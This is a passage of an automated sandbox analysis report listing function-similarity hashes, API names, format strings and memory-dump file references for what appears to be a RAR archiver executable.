                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50514EB2B246658AEB54CFB4E4405AC37B1F758788B60803AEE0E97B58EF38D555CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                                                                                                • API String ID: 0-13699710
                                                                                                                                                                                                                                                • Opcode ID: a089de7db546ec3fe26c7bfa736cb08088992f1168ee6607c265857eb037a30e
                                                                                                                                                                                                                                                • Instruction ID: f10d92d651ab01f8464b6c8bb4f3b8259e23168c350f318d6baf702d2187d97d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a089de7db546ec3fe26c7bfa736cb08088992f1168ee6607c265857eb037a30e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD81E921A1C6A285EA32DB64E4312FD1391FFA5394F604931FA5D8B6DBDE2EE505C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwindabort
                                                                                                                                                                                                                                                • String ID: csm$f
                                                                                                                                                                                                                                                • API String ID: 3913153233-629598281
                                                                                                                                                                                                                                                • Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                                • Instruction ID: b803fbeaa90821c5a1ce5a4976b00c77ffdf81cc50584ad89037f21d4d1f633a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA61F736B2866286EB15DFA1F414A7937A1FB64794F288570FE0E83744DF3AF840A701
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Security$File$DescriptorLength
                                                                                                                                                                                                                                                • String ID: $ACL
                                                                                                                                                                                                                                                • API String ID: 2361174398-1852320022
                                                                                                                                                                                                                                                • Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                                • Instruction ID: 7f9443cd7688c605441e9ddf91878aa7497c553ce75ad93410c59feef24ac373
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB31A265B1DA9292FA21DB20F4613E963A5FBA8780F900431FA8DC3756DF3DE605C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$File$swprintf$LocalSystem
                                                                                                                                                                                                                                                • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                                                                                                                                                                                                                • API String ID: 1364621626-1794493780
                                                                                                                                                                                                                                                • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                                • Instruction ID: a2e307b8e149c0c817768d65a8532c7a041c6898070dcac4715c8531a7b4862c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD21E4B6A282618EE750CF64E480A9E77F0F758794F248022FE58D3B48DF39E9418F10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 643171463-0
                                                                                                                                                                                                                                                • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                                                • Instruction ID: 711003bc8828bf458457b48d04d76d4b89c60fe82feef61992cdacbb810c823f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66412761F1DAA242F9259B60B8202B96250BF75BB0F201339FD6D977E1CE3CE549D300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190572456-0
                                                                                                                                                                                                                                                • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                                                • Instruction ID: c595da304aca96a0d9195b2faa2d2f68e2c79229a1cb6acab7074573db7694d6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A541F871B29A2292FE558B56F8145B96291BF34BD0F398539FD1DCB784EE3CE804A340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                                • Instruction ID: 1ea6f55d27af50b7aa5f6a445b8f891780a4d7e7cd0157aa93dad983fd1032fd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98115176F7CE2306FA551524F4863B911456F753A0E34863CFA6EC66D6CEACAC807242
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                                • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                                                                                                • API String ID: 233258989-622958660
                                                                                                                                                                                                                                                • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                                • Instruction ID: ac02c8d22ddc4d0f7781c752995087097fc057e7659bf739d815d3be928baa85
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72515BF3F386548AE3598F1CF881BA92690F374B90F545A25F94AD3B44DA3DDA448B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: wcschr
                                                                                                                                                                                                                                                • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                                                                                                • API String ID: 1497570035-1725859250
                                                                                                                                                                                                                                                • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                                • Instruction ID: 214a8364a2de58a1d469ca50b03e4899e940ee0c066e107147742b83d88b4b25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D241D616D0C9B380F6329B20916157E5651EF34B84F784832FA1DC62DAEE7FF4929721
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 904936192-0
                                                                                                                                                                                                                                                • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                                • Instruction ID: bd3e7bc28edb244c77d3100ed7ddf4eea7c7943c6042d4ad036d1408e4598b14
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E512362A29A9181EB01CF25E4603AD73A1FB94B98F188231FF5E877A5DF3DD141D300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4141327611-0
                                                                                                                                                                                                                                                • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                                • Instruction ID: 74f50ecd4d948f101446ab9d386de1d61ecb8f2a78f036088f7123212a37d402
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1741B82192DB6246FB758B50B048379A691EF70B90F344138FE5E86AC5CF3CDC41A702
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00007FF60E5C86CB,?,?,?,00007FF60E5CA5CB,?,?,00000000,?,?,00000040,?,?,00007FF60E5C2DF9), ref: 00007FF60E5DD09D
                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00007FF60E5C86CB,?,?,?,00007FF60E5CA5CB,?,?,00000000,?,?,00000040,?,?,00007FF60E5C2DF9), ref: 00007FF60E5DD0E5
                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00007FF60E5C86CB,?,?,?,00007FF60E5CA5CB,?,?,00000000,?,?,00000040,?,?,00007FF60E5C2DF9), ref: 00007FF60E5DD114
